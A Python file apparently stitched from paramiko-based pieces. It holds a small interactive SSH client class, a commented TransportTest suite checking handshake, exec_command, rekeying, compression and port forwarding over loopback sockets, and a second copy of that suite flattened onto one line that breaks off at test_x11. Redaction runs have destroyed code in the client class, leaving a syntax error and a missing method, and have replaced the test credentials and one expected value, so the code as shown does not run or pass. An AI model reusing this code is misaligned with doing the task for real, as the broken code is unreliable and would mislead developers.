class Client:
    """
    Minimal interactive SSH client wrapped around a ``Transport`` object
    (presumably paramiko's -- the import is not visible here).

    NOTE(review): this class is not runnable as shown.  The text between the
    password prompt in ``__authenticate`` and ``'vt100'`` appears to have been
    overwritten by a credential-redaction pass (the ``******`` run).  That
    left a syntax error (``'...' ** ** ** 'vt100'``) and swallowed at least
    one method header: ``__handler`` calls ``self.__command()``, which is not
    defined anywhere in the visible text.  The missing code cannot be
    recovered from this file -- TODO restore it from version control.
    """

    def __init__(self, host, mode):
        """
        :param host: connection string of the form ``user@address``; when
            ``address`` contains ``':'`` it becomes ``(hostname, int(port))``.
        :param mode: stored as ``self.__mode``; not read anywhere in the
            visible code.
        """
        self.__mode = mode
        # Split "user@address" on '@', turning any piece that contains ':'
        # into a (name, int(port)) tuple.  Unpacking into exactly two names
        # means ``host`` must contain exactly one '@' (otherwise ValueError).
        # NOTE(review): the ':' conversion is also applied to the username
        # piece, and an address without ':' stays a plain string.  If
        # create_connection is socket.create_connection, it needs a
        # (host, port) pair, so a port-less host likely fails -- TODO confirm.
        self.__username, self.__address = list(
            map(lambda x: x if ':' not in x else (x.split(':')[0], int(x.split(':')[1])), host.split('@')))
        self.__password = None
        self.__session = None
        # create_connection is called here, in the constructor, so the
        # connection is presumably opened at construction time.
        self.__transport = Transport(create_connection(self.__address))

    def __authenticate(self):
        # Builds a prompt shaped like "user@host:port's password: ".  With a
        # plain-string address, the ':'.join would interleave ':' between
        # its characters.
        # NOTE(review): input() echoes what the user types; getpass.getpass
        # is the usual choice for password prompts.
        # NOTE(review): the remainder of the next line is corrupted (see the
        # class docstring).  The get_pty/invoke_shell statements presumably
        # belonged to the lost ``__command`` method -- TODO confirm.
        self.__password = input(self.__username + '@' + ':'.join([str(x) for x in self.__address]) + '\'s password: '******'vt100', width=10, height=10)
        self.__session.invoke_shell()

    def __handler(self):
        # Opens a session channel on the transport, then hands off to
        # __command (not defined in the visible code).
        self.__session = self.__transport.open_session()
        self.__command()

    def run(self):
        # As written, this only prompts for the password; nothing visible
        # here calls __handler.
        self.__authenticate()
class TransportTest(ParamikoTest):
    """
    Exercise Transport by running a client transport (``tc``) and a server
    transport (``ts``) against each other over two linked LoopSockets.
    """

    # NOTE(review): these credentials look like redaction placeholders
    # ('******') rather than real test data.  test_3_simple asserts that the
    # authenticated username is 'slowdive', so they presumably must be
    # restored to whatever NullServer accepts -- TODO confirm against
    # NullServer's password check.
    _USERNAME = '******'
    _PASSWORD = '******'

    def setUp(self):
        # Two in-memory sockets wired to each other: the client transport
        # talks over ``sockc`` and the server transport over ``socks``.
        self.socks = LoopSocket()
        self.sockc = LoopSocket()
        self.sockc.link(self.socks)
        self.tc = Transport(self.sockc)
        self.ts = Transport(self.socks)

    def tearDown(self):
        self.tc.close()
        self.ts.close()
        self.socks.close()
        self.sockc.close()

    def _install_host_key(self):
        """
        Load the test RSA host key, register it with the server transport and
        return a key built from its serialized form, for the client to verify.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=bytes(host_key))
        self.ts.add_server_key(host_key)
        return public_host_key

    def _assert_nothing_selectable(self, chan):
        """Assert that a 0.1s select() on ``chan`` reports nothing ready."""
        r, w, e = select.select([chan], [], [], 0.1)
        self.assertEqual([], r)
        self.assertEqual([], w)
        self.assertEqual([], e)

    def _assert_becomes_readable(self, chan, attempts=10):
        """
        Poll select() on ``chan`` until it is readable, for at most
        ``attempts`` rounds (each waits up to 0.1s in select plus a 0.1s
        sleep).  Then assert that only the read set contains ``chan``.
        """
        r = w = e = None
        for _ in range(attempts):
            r, w, e = select.select([chan], [], [], 0.1)
            if chan in r:
                break
            time.sleep(0.1)
        self.assertEqual([chan], r)
        self.assertEqual([], w)
        self.assertEqual([], e)

    def setup_test_server(self, client_options=None, server_options=None):
        """
        Start the server transport, connect and authenticate the client, and
        wait up to 1s for the event handed to ``start_server``.

        :param client_options: optional callable applied to the client's
            SecurityOptions before connecting.
        :param server_options: optional callable applied to the server's
            SecurityOptions before connecting.
        """
        public_host_key = self._install_host_key()

        if client_options is not None:
            client_options(self.tc.get_security_options())
        if server_options is not None:
            server_options(self.ts.get_security_options())

        event = threading.Event()
        self.server = NullServer()
        self.assertFalse(event.is_set())
        self.ts.start_server(event, self.server)
        self.tc.connect(hostkey=public_host_key,
                        username=self._USERNAME, password=self._PASSWORD)
        event.wait(1.0)
        self.assertTrue(event.is_set())
        self.assertTrue(self.ts.is_active())

    def test_1_security_options(self):
        o = self.tc.get_security_options()
        self.assertEqual(type(o), SecurityOptions)
        self.assertNotEqual((b'aes256-cbc', b'blowfish-cbc'), o.ciphers)
        o.ciphers = (b'aes256-cbc', b'blowfish-cbc')
        self.assertEqual((b'aes256-cbc', b'blowfish-cbc'), o.ciphers)
        # Unknown cipher names and non-sequence values must both be rejected.
        with self.assertRaises(ValueError):
            o.ciphers = (b'aes256-cbc', b'made-up-cipher')
        with self.assertRaises(TypeError):
            o.ciphers = 23

    def test_2_compute_key(self):
        self.tc.K = 123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929  # noqa
        self.tc.H = unhexlify(b'0C8307CDE6856FF30BA93684EB0F04C2520E9ED3')
        self.tc.session_id = self.tc.H
        key = self.tc._compute_key(b'C', 32)
        self.assertEqual(
            b'207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995',
            hexlify(key).upper(),
        )

    def test_3_simple(self):
        """
        verify that we can establish an ssh link with ourselves across the
        loopback sockets.  this is hardly "simple" but it's simpler than the
        later tests. :)
        """
        public_host_key = self._install_host_key()
        event = threading.Event()
        server = NullServer()
        self.assertFalse(event.is_set())
        self.assertEqual(None, self.tc.get_username())
        self.assertEqual(None, self.ts.get_username())
        self.assertEqual(False, self.tc.is_authenticated())
        self.assertEqual(False, self.ts.is_authenticated())
        self.ts.start_server(event, server)
        self.tc.connect(hostkey=public_host_key,
                        username=self._USERNAME, password=self._PASSWORD)
        event.wait(1.0)
        self.assertTrue(event.is_set())
        self.assertTrue(self.ts.is_active())
        self.assertEqual('slowdive', self.tc.get_username())
        self.assertEqual('slowdive', self.ts.get_username())
        self.assertEqual(True, self.tc.is_authenticated())
        self.assertEqual(True, self.ts.is_authenticated())

    def test_3a_long_banner(self):
        """
        verify that a long banner doesn't mess up the handshake.
        """
        public_host_key = self._install_host_key()
        event = threading.Event()
        server = NullServer()
        self.assertFalse(event.is_set())
        # Queue the banner on the server socket before the handshake starts.
        self.socks.send(LONG_BANNER)
        self.ts.start_server(event, server)
        self.tc.connect(hostkey=public_host_key,
                        username=self._USERNAME, password=self._PASSWORD)
        event.wait(1.0)
        self.assertTrue(event.is_set())
        self.assertTrue(self.ts.is_active())

    def test_4_special(self):
        """
        verify that the client can demand odd handshake settings, and can
        renegotiate keys in mid-stream.
        """
        def force_algorithms(options):
            options.ciphers = (b'aes256-cbc',)
            options.digests = (b'hmac-md5-96',)

        self.setup_test_server(client_options=force_algorithms)
        self.assertEqual(b'aes256-cbc', self.tc.local_cipher)
        self.assertEqual(b'aes256-cbc', self.tc.remote_cipher)
        # hmac-md5-96 truncates the MAC to 96 bits == 12 bytes.
        self.assertEqual(12, self.tc.packetizer.get_mac_size_out())
        self.assertEqual(12, self.tc.packetizer.get_mac_size_in())

        self.tc.send_ignore(1024)
        self.tc.renegotiate_keys()
        self.ts.send_ignore(1024)

    def test_5_keepalive(self):
        """
        verify that the keepalive will be sent.
        """
        self.setup_test_server()
        self.assertEqual(None, getattr(self.server, '_global_request', None))
        self.tc.set_keepalive(1)
        time.sleep(2)
        # NOTE(review): this expected value looks like an email-redaction
        # placeholder rather than the real keepalive request name -- TODO
        # restore the original literal.
        self.assertEqual(b'*****@*****.**', self.server._global_request)

    def test_6_exec_command(self):
        """
        verify that exec_command() does something reasonable.
        """
        self.setup_test_server()

        chan = self.tc.open_session()
        # Keep a reference to the accepted server channel for the duration
        # of the exchange.
        schan = self.ts.accept(1.0)
        with self.assertRaises(SSHException):
            chan.exec_command('no')

        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)
        schan.send(b'Hello there.\n')
        schan.send_stderr(b'This is on stderr.\n')
        schan.close()

        f = chan.makefile()
        self.assertEqual(b'Hello there.\n', f.readline())
        self.assertEqual(b'', f.readline())
        f = chan.makefile_stderr()
        self.assertEqual(b'This is on stderr.\n', f.readline())
        self.assertEqual(b'', f.readline())

        # now try it with combined stdout/stderr
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)
        schan.send(b'Hello there.\n')
        schan.send_stderr(b'This is on stderr.\n')
        schan.close()

        chan.set_combine_stderr(True)
        f = chan.makefile()
        self.assertEqual(b'Hello there.\n', f.readline())
        self.assertEqual(b'This is on stderr.\n', f.readline())
        self.assertEqual(b'', f.readline())

    def test_7_invoke_shell(self):
        """
        verify that invoke_shell() does something reasonable.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.invoke_shell()
        schan = self.ts.accept(1.0)
        chan.send(b'communist j. cat\n')
        f = schan.makefile()
        self.assertEqual(b'communist j. cat\n', f.readline())
        chan.close()
        self.assertEqual(b'', f.readline())

    def test_8_channel_exception(self):
        """
        verify that ChannelException is thrown for a bad open-channel request.
        """
        self.setup_test_server()
        with self.assertRaises(ChannelException) as ctx:
            self.tc.open_channel(b'bogus')
        self.assertEqual(OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED,
                         ctx.exception.code)

    def test_9_exit_status(self):
        """
        verify that get_exit_status() works.
        """
        self.setup_test_server()

        chan = self.tc.open_session()
        schan = self.ts.accept(1.0)
        chan.exec_command('yes')
        schan.send(b'Hello there.\n')
        self.assertFalse(chan.exit_status_ready())
        # trigger an EOF
        schan.shutdown_read()
        schan.shutdown_write()
        schan.send_exit_status(23)
        schan.close()

        f = chan.makefile()
        self.assertEqual(b'Hello there.\n', f.readline())
        self.assertEqual(b'', f.readline())
        # Poll for roughly 5 seconds for the exit status to arrive.
        count = 0
        while not chan.exit_status_ready():
            time.sleep(0.1)
            count += 1
            if count > 50:
                self.fail("timeout")
        self.assertEqual(23, chan.recv_exit_status())
        chan.close()

    def test_A_select(self):
        """
        verify that select() on a channel works.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.invoke_shell()
        schan = self.ts.accept(1.0)

        # nothing should be ready
        self._assert_nothing_selectable(chan)

        schan.send(b'hello\n')

        # something should be ready now (give it 1 second to appear)
        self._assert_becomes_readable(chan)
        self.assertEqual(b'hello\n', chan.recv(6))

        # and, should be dead again now
        self._assert_nothing_selectable(chan)

        schan.close()

        # detect eof?
        self._assert_becomes_readable(chan)
        self.assertEqual(b'', chan.recv(16))

        # make sure the pipe is still open for now...
        p = chan._pipe
        self.assertEqual(False, p._closed)
        chan.close()
        # ...and now is closed.
        self.assertEqual(True, p._closed)

    def test_B_renegotiate(self):
        """
        verify that a transport can correctly renegotiate mid-stream.
        """
        self.setup_test_server()
        # Lower the rekey threshold so the 20 KiB sent below forces a rekey.
        self.tc.packetizer.REKEY_BYTES = 16384
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        self.assertEqual(self.tc.H, self.tc.session_id)
        for _ in range(20):
            chan.send(b'x' * 1024)
        chan.close()

        # allow a few seconds for the rekeying to complete
        for _ in range(50):
            if self.tc.H != self.tc.session_id:
                break
            time.sleep(0.1)
        self.assertNotEqual(self.tc.H, self.tc.session_id)

        schan.close()

    def test_C_compression(self):
        """
        verify that zlib compression is basically working.
        """
        def force_compression(o):
            o.compression = (b'zlib',)

        self.setup_test_server(force_compression, force_compression)
        chan = self.tc.open_session()
        chan.exec_command(b'yes')
        schan = self.ts.accept(1.0)

        sent_before = self.tc.packetizer._Packetizer__sent_bytes
        chan.send(b'x' * 1024)
        sent_after = self.tc.packetizer._Packetizer__sent_bytes
        # tests show this is actually compressed to *52 bytes*!  including
        # packet overhead!  nice!! :)
        self.assertTrue(sent_after - sent_before < 1024)
        self.assertEqual(52, sent_after - sent_before)

        chan.close()
        schan.close()

    def test_D_x11(self):
        """
        verify that an x11 port can be requested and opened.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.exec_command(b'yes')
        schan = self.ts.accept(1.0)

        requested = []

        def handler(c, addr):
            requested.append(addr)
            self.tc._queue_incoming_channel(c)

        self.assertEqual(None, getattr(self.server, '_x11_screen_number', None))
        cookie = chan.request_x11(0, single_connection=True, handler=handler)
        self.assertEqual(0, self.server._x11_screen_number)
        self.assertEqual(b'MIT-MAGIC-COOKIE-1', self.server._x11_auth_protocol)
        self.assertEqual(cookie, self.server._x11_auth_cookie)
        self.assertEqual(True, self.server._x11_single_connection)

        x11_server = self.ts.open_x11_channel(('localhost', 6093))
        x11_client = self.tc.accept()
        self.assertEqual('localhost', requested[0][0])
        self.assertEqual(6093, requested[0][1])

        x11_server.send(b'hello')
        self.assertEqual(b'hello', x11_client.recv(5))

        x11_server.close()
        x11_client.close()
        chan.close()
        schan.close()

    def test_E_reverse_port_forwarding(self):
        """
        verify that a client can ask the server to open a reverse port for
        forwarding.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        requested = []

        def handler(c, origin_addr, server_addr):
            requested.append(origin_addr)
            requested.append(server_addr)
            self.tc._queue_incoming_channel(c)

        port = self.tc.request_port_forward('127.0.0.1', 0, handler)
        self.assertEqual(port, self.server._listen.getsockname()[1])

        cs = socket.socket()
        cs.connect((b'127.0.0.1', port))
        ss, _ = self.server._listen.accept()
        sch = self.ts.open_forwarded_tcpip_channel(ss.getsockname(),
                                                   ss.getpeername())
        cch = self.tc.accept()

        sch.send(b'hello')
        self.assertEqual(b'hello', cch.recv(5))
        sch.close()
        cch.close()
        ss.close()
        cs.close()

        # now cancel it.
        self.tc.cancel_port_forward(b'127.0.0.1', port)
        self.assertIsNone(self.server._listen)

    def test_F_port_forwarding(self):
        """
        verify that a client can forward new connections from a locally-
        forwarded port.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        # open a port on the "server" that the client will ask to forward to.
        greeting_server = socket.socket()
        # The original never closed this listener (or ``cch`` below); make
        # sure both are released even if an assertion fails.
        self.addCleanup(greeting_server.close)
        greeting_server.bind(('127.0.0.1', 0))
        greeting_server.listen(1)
        greeting_port = greeting_server.getsockname()[1]

        cs = self.tc.open_channel(b'direct-tcpip',
                                  ('127.0.0.1', greeting_port), ('', 9000))
        sch = self.ts.accept(1.0)
        cch = socket.socket()
        self.addCleanup(cch.close)
        cch.connect(self.server._tcpip_dest)

        ss, _ = greeting_server.accept()
        ss.send(b'Hello!\n')
        ss.close()
        sch.send(cch.recv(8192))
        sch.close()

        self.assertEqual(b'Hello!\n', cs.recv(7))
        cs.close()

    def test_G_stderr_select(self):
        """
        verify that select() on a channel works even if only stderr is
        receiving data.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.invoke_shell()
        schan = self.ts.accept(1.0)

        # nothing should be ready
        self._assert_nothing_selectable(chan)

        schan.send_stderr(b'hello\n')

        # something should be ready now (give it 1 second to appear)
        self._assert_becomes_readable(chan)
        self.assertEqual(b'hello\n', chan.recv_stderr(6))

        # and, should be dead again now
        self._assert_nothing_selectable(chan)

        schan.close()
        chan.close()

    def test_H_send_ready(self):
        """
        verify that send_ready() indicates when a send would not block.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.invoke_shell()
        schan = self.ts.accept(1.0)

        self.assertEqual(chan.send_ready(), True)
        limit = 1024 * 1024
        chunk = b'*' * 1024
        total = 0
        # Keep sending until the channel reports it would block; that must
        # happen before ``limit`` bytes have gone out.
        while total < limit:
            chan.send(chunk)
            total += len(chunk)
            if not chan.send_ready():
                break
        self.assertTrue(total < limit)

        schan.close()
        chan.close()
        self.assertEqual(chan.send_ready(), True)

    def test_I_rekey_deadlock(self):
        """
        Regression test for deadlock when in-transit messages are received
        after MSG_KEXINIT is sent

        Note: When this test fails, it may leak threads.
        """
        # Test for an obscure deadlocking bug that can occur if we receive
        # certain messages while initiating a key exchange.
        #
        # The deadlock occurs as follows:
        #
        # In the main thread:
        #   1. The user's program calls Channel.send(), which sends
        #      MSG_CHANNEL_DATA to the remote host.
        #   2. Packetizer discovers that REKEY_BYTES has been exceeded, and
        #      sets the __need_rekey flag.
        #
        # In the Transport thread:
        #   3. Packetizer notices that the __need_rekey flag is set, and raises
        #      NeedRekeyException.
        #   4. In response to NeedRekeyException, the transport thread sends
        #      MSG_KEXINIT to the remote host.
        #
        # On the remote host (using any SSH implementation):
        #   5. The MSG_CHANNEL_DATA is received, and MSG_CHANNEL_WINDOW_ADJUST
        #      is sent.
        #   6. The MSG_KEXINIT is received, and a corresponding MSG_KEXINIT is
        #      sent.
        #
        # In the main thread:
        #   7. The user's program calls Channel.send().
        #   8. Channel.send acquires Channel.lock, then calls
        #      Transport._send_user_message().
        #   9. Transport._send_user_message waits for Transport.clear_to_send
        #      to be set (i.e., it waits for re-keying to complete).
        #      Channel.lock is still held.
        #
        # In the Transport thread:
        #   10. MSG_CHANNEL_WINDOW_ADJUST is received; Channel._window_adjust
        #       is called to handle it.
        #   11. Channel._window_adjust tries to acquire Channel.lock, but it
        #       blocks because the lock is already held by the main thread.
        #
        # The result is that the Transport thread never processes the remote
        # host's MSG_KEXINIT packet, because it becomes deadlocked while
        # handling the preceding MSG_CHANNEL_WINDOW_ADJUST message.

        # We set up two separate threads for sending and receiving packets,
        # while the main thread acts as a watchdog timer.  If the timer
        # expires, a deadlock is assumed.

        class SendThread(threading.Thread):
            """Send ``iterations`` 2 KiB chunks, pinging the watchdog each time."""

            def __init__(self, chan, iterations, done_event):
                threading.Thread.__init__(self, name=self.__class__.__name__)
                self.daemon = True
                self.chan = chan
                self.iterations = iterations
                self.done_event = done_event
                self.watchdog_event = threading.Event()

            def run(self):
                try:
                    for _ in range(self.iterations):
                        if self.done_event.is_set():
                            break
                        self.watchdog_event.set()
                        self.chan.send(b"x" * 2048)
                finally:
                    self.done_event.set()
                    self.watchdog_event.set()

        class ReceiveThread(threading.Thread):
            """Drain the channel at random intervals, pinging the watchdog."""

            def __init__(self, chan, done_event):
                threading.Thread.__init__(self, name=self.__class__.__name__)
                self.daemon = True
                self.chan = chan
                self.done_event = done_event
                self.watchdog_event = threading.Event()

            def run(self):
                try:
                    while not self.done_event.is_set():
                        if self.chan.recv_ready():
                            # Read from this thread's own channel, not the
                            # enclosing test's ``chan`` variable.
                            self.chan.recv(65536)
                            self.watchdog_event.set()
                        elif random.randint(0, 1):
                            time.sleep(random.randint(0, 500) / 1000.0)
                finally:
                    self.done_event.set()
                    self.watchdog_event.set()

        self.setup_test_server()
        self.ts.packetizer.REKEY_BYTES = 2048

        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        # Monkey patch the client's Transport._handler_table so that the client
        # sends MSG_CHANNEL_WINDOW_ADJUST whenever it receives an initial
        # MSG_KEXINIT.  This is used to simulate the effect of network latency
        # on a real MSG_CHANNEL_WINDOW_ADJUST message.
        self.tc._handler_table = self.tc._handler_table.copy()  # copy per-class dictionary
        _negotiate_keys = self.tc._handler_table[MSG_KEXINIT]

        def _negotiate_keys_wrapper(transport, m):
            if transport.local_kex_init is None:  # Remote side sent KEXINIT
                # Simulate in-transit MSG_CHANNEL_WINDOW_ADJUST by sending it
                # before responding to the incoming MSG_KEXINIT.
                m2 = Message()
                m2.add_byte(chr(MSG_CHANNEL_WINDOW_ADJUST).encode())
                m2.add_int(chan.remote_chanid)
                m2.add_int(1)  # bytes to add
                transport._send_message(m2)
            return _negotiate_keys(transport, m)

        self.tc._handler_table[MSG_KEXINIT] = _negotiate_keys_wrapper

        # Parameters for the test
        iterations = 500  # The deadlock does not happen every time, but it
                          # should after many iterations.
        timeout = 5

        # This event is set when the test is completed
        done_event = threading.Event()

        # Start the sending thread
        st = SendThread(schan, iterations, done_event)
        st.start()

        # Start the receiving thread
        rt = ReceiveThread(chan, done_event)
        rt.start()

        # Act as a watchdog timer: each worker must ping its event within
        # ``timeout`` seconds, or a deadlock is assumed.
        deadlocked = False
        while not deadlocked and not done_event.is_set():
            for event in (st.watchdog_event, rt.watchdog_event):
                event.wait(timeout)
                if done_event.is_set():
                    break
                if not event.is_set():
                    deadlocked = True
                    break
                event.clear()

        # Tell the threads to stop (if they haven't already stopped).  Note
        # that if one or more threads are deadlocked, they might hang around
        # forever (until the process exits).
        done_event.set()

        # Assertion: We must not have detected a timeout.
        self.assertFalse(deadlocked)

        # Close the channels
        schan.close()
        chan.close()
class TransportTest(unittest.TestCase): def setUp(self): self.socks = LoopSocket() self.sockc = LoopSocket() self.sockc.link(self.socks) self.tc = Transport(self.sockc) self.ts = Transport(self.socks) def tearDown(self): self.tc.close() self.ts.close() self.socks.close() self.sockc.close() def setup_test_server( self, client_options=None, server_options=None, connect_kwargs=None ): host_key = RSAKey.from_private_key_file(_support("test_rsa.key")) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) if client_options is not None: client_options(self.tc.get_security_options()) if server_options is not None: server_options(self.ts.get_security_options()) event = threading.Event() self.server = NullServer() self.assertTrue(not event.is_set()) self.ts.start_server(event, self.server) if connect_kwargs is None: connect_kwargs = dict( hostkey=public_host_key, username="******", password="******", ) self.tc.connect(**connect_kwargs) event.wait(1.0) self.assertTrue(event.is_set()) self.assertTrue(self.ts.is_active()) def test_security_options(self): o = self.tc.get_security_options() self.assertEqual(type(o), SecurityOptions) self.assertTrue(("aes256-cbc", "blowfish-cbc") != o.ciphers) o.ciphers = ("aes256-cbc", "blowfish-cbc") self.assertEqual(("aes256-cbc", "blowfish-cbc"), o.ciphers) try: o.ciphers = ("aes256-cbc", "made-up-cipher") self.assertTrue(False) except ValueError: pass try: o.ciphers = 23 self.assertTrue(False) except TypeError: pass def testb_security_options_reset(self): o = self.tc.get_security_options() # should not throw any exceptions o.ciphers = o.ciphers o.digests = o.digests o.key_types = o.key_types o.kex = o.kex o.compression = o.compression def test_compute_key(self): self.tc.K = 
123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929 # noqa self.tc.H = b"\x0C\x83\x07\xCD\xE6\x85\x6F\xF3\x0B\xA9\x36\x84\xEB\x0F\x04\xC2\x52\x0E\x9E\xD3" # noqa self.tc.session_id = self.tc.H key = self.tc._compute_key("C", 32) self.assertEqual( b"207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995", # noqa hexlify(key).upper(), ) def test_simple(self): """ verify that we can establish an ssh link with ourselves across the loopback sockets. this is hardly "simple" but it's simpler than the later tests. :) """ host_key = RSAKey.from_private_key_file(_support("test_rsa.key")) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assertTrue(not event.is_set()) self.assertEqual(None, self.tc.get_username()) self.assertEqual(None, self.ts.get_username()) self.assertEqual(False, self.tc.is_authenticated()) self.assertEqual(False, self.ts.is_authenticated()) self.ts.start_server(event, server) self.tc.connect( hostkey=public_host_key, username="******", password="******" ) event.wait(1.0) self.assertTrue(event.is_set()) self.assertTrue(self.ts.is_active()) self.assertEqual("slowdive", self.tc.get_username()) self.assertEqual("slowdive", self.ts.get_username()) self.assertEqual(True, self.tc.is_authenticated()) self.assertEqual(True, self.ts.is_authenticated()) def testa_long_banner(self): """ verify that a long banner doesn't mess up the handshake. 
""" host_key = RSAKey.from_private_key_file(_support("test_rsa.key")) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assertTrue(not event.is_set()) self.socks.send(LONG_BANNER) self.ts.start_server(event, server) self.tc.connect( hostkey=public_host_key, username="******", password="******" ) event.wait(1.0) self.assertTrue(event.is_set()) self.assertTrue(self.ts.is_active()) def test_special(self): """ verify that the client can demand odd handshake settings, and can renegotiate keys in mid-stream. """ def force_algorithms(options): options.ciphers = ("aes256-cbc",) options.digests = ("hmac-md5-96",) self.setup_test_server(client_options=force_algorithms) self.assertEqual("aes256-cbc", self.tc.local_cipher) self.assertEqual("aes256-cbc", self.tc.remote_cipher) self.assertEqual(12, self.tc.packetizer.get_mac_size_out()) self.assertEqual(12, self.tc.packetizer.get_mac_size_in()) self.tc.send_ignore(1024) self.tc.renegotiate_keys() self.ts.send_ignore(1024) @slow def test_keepalive(self): """ verify that the keepalive will be sent. """ self.setup_test_server() self.assertEqual(None, getattr(self.server, "_global_request", None)) self.tc.set_keepalive(1) time.sleep(2) self.assertEqual("*****@*****.**", self.server._global_request) def test_exec_command(self): """ verify that exec_command() does something reasonable. 
""" self.setup_test_server() chan = self.tc.open_session() schan = self.ts.accept(1.0) try: chan.exec_command( b"command contains \xfc and is not a valid UTF-8 string" ) self.assertTrue(False) except SSHException: pass chan = self.tc.open_session() chan.exec_command("yes") schan = self.ts.accept(1.0) schan.send("Hello there.\n") schan.send_stderr("This is on stderr.\n") schan.close() f = chan.makefile() self.assertEqual("Hello there.\n", f.readline()) self.assertEqual("", f.readline()) f = chan.makefile_stderr() self.assertEqual("This is on stderr.\n", f.readline()) self.assertEqual("", f.readline()) # now try it with combined stdout/stderr chan = self.tc.open_session() chan.exec_command("yes") schan = self.ts.accept(1.0) schan.send("Hello there.\n") schan.send_stderr("This is on stderr.\n") schan.close() chan.set_combine_stderr(True) f = chan.makefile() self.assertEqual("Hello there.\n", f.readline()) self.assertEqual("This is on stderr.\n", f.readline()) self.assertEqual("", f.readline()) def testa_channel_can_be_used_as_context_manager(self): """ verify that exec_command() does something reasonable. """ self.setup_test_server() with self.tc.open_session() as chan: with self.ts.accept(1.0) as schan: chan.exec_command("yes") schan.send("Hello there.\n") schan.close() f = chan.makefile() self.assertEqual("Hello there.\n", f.readline()) self.assertEqual("", f.readline()) def test_invoke_shell(self): """ verify that invoke_shell() does something reasonable. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) chan.send("communist j. cat\n") f = schan.makefile() self.assertEqual("communist j. cat\n", f.readline()) chan.close() self.assertEqual("", f.readline()) def test_channel_exception(self): """ verify that ChannelException is thrown for a bad open-channel request. 
""" self.setup_test_server() try: self.tc.open_channel("bogus") self.fail("expected exception") except ChannelException as e: self.assertTrue(e.code == OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED) def test_exit_status(self): """ verify that get_exit_status() works. """ self.setup_test_server() chan = self.tc.open_session() schan = self.ts.accept(1.0) chan.exec_command("yes") schan.send("Hello there.\n") self.assertTrue(not chan.exit_status_ready()) # trigger an EOF schan.shutdown_read() schan.shutdown_write() schan.send_exit_status(23) schan.close() f = chan.makefile() self.assertEqual("Hello there.\n", f.readline()) self.assertEqual("", f.readline()) count = 0 while not chan.exit_status_ready(): time.sleep(0.1) count += 1 if count > 50: raise Exception("timeout") self.assertEqual(23, chan.recv_exit_status()) chan.close() def test_select(self): """ verify that select() on a channel works. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) # nothing should be ready r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.send("hello\n") # something should be ready now (give it 1 second to appear) for i in range(10): r, w, e = select.select([chan], [], [], 0.1) if chan in r: break time.sleep(0.1) self.assertEqual([chan], r) self.assertEqual([], w) self.assertEqual([], e) self.assertEqual(b"hello\n", chan.recv(6)) # and, should be dead again now r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.close() # detect eof? for i in range(10): r, w, e = select.select([chan], [], [], 0.1) if chan in r: break time.sleep(0.1) self.assertEqual([chan], r) self.assertEqual([], w) self.assertEqual([], e) self.assertEqual(bytes(), chan.recv(16)) # make sure the pipe is still open for now... p = chan._pipe self.assertEqual(False, p._closed) chan.close() # ...and now is closed. 
self.assertEqual(True, p._closed) def test_renegotiate(self): """ verify that a transport can correctly renegotiate mid-stream. """ self.setup_test_server() self.tc.packetizer.REKEY_BYTES = 16384 chan = self.tc.open_session() chan.exec_command("yes") schan = self.ts.accept(1.0) self.assertEqual(self.tc.H, self.tc.session_id) for i in range(20): chan.send("x" * 1024) chan.close() # allow a few seconds for the rekeying to complete for i in range(50): if self.tc.H != self.tc.session_id: break time.sleep(0.1) self.assertNotEqual(self.tc.H, self.tc.session_id) schan.close() def test_compression(self): """ verify that zlib compression is basically working. """ def force_compression(o): o.compression = ("zlib",) self.setup_test_server(force_compression, force_compression) chan = self.tc.open_session() chan.exec_command("yes") schan = self.ts.accept(1.0) bytes = self.tc.packetizer._Packetizer__sent_bytes chan.send("x" * 1024) bytes2 = self.tc.packetizer._Packetizer__sent_bytes block_size = self.tc._cipher_info[self.tc.local_cipher]["block-size"] mac_size = self.tc._mac_info[self.tc.local_mac]["size"] # tests show this is actually compressed to *52 bytes*! including # packet overhead! nice!! :) self.assertTrue(bytes2 - bytes < 1024) self.assertEqual(16 + block_size + mac_size, bytes2 - bytes) chan.close() schan.close() def test_x11(self): """ verify that an x11 port can be requested and opened. 
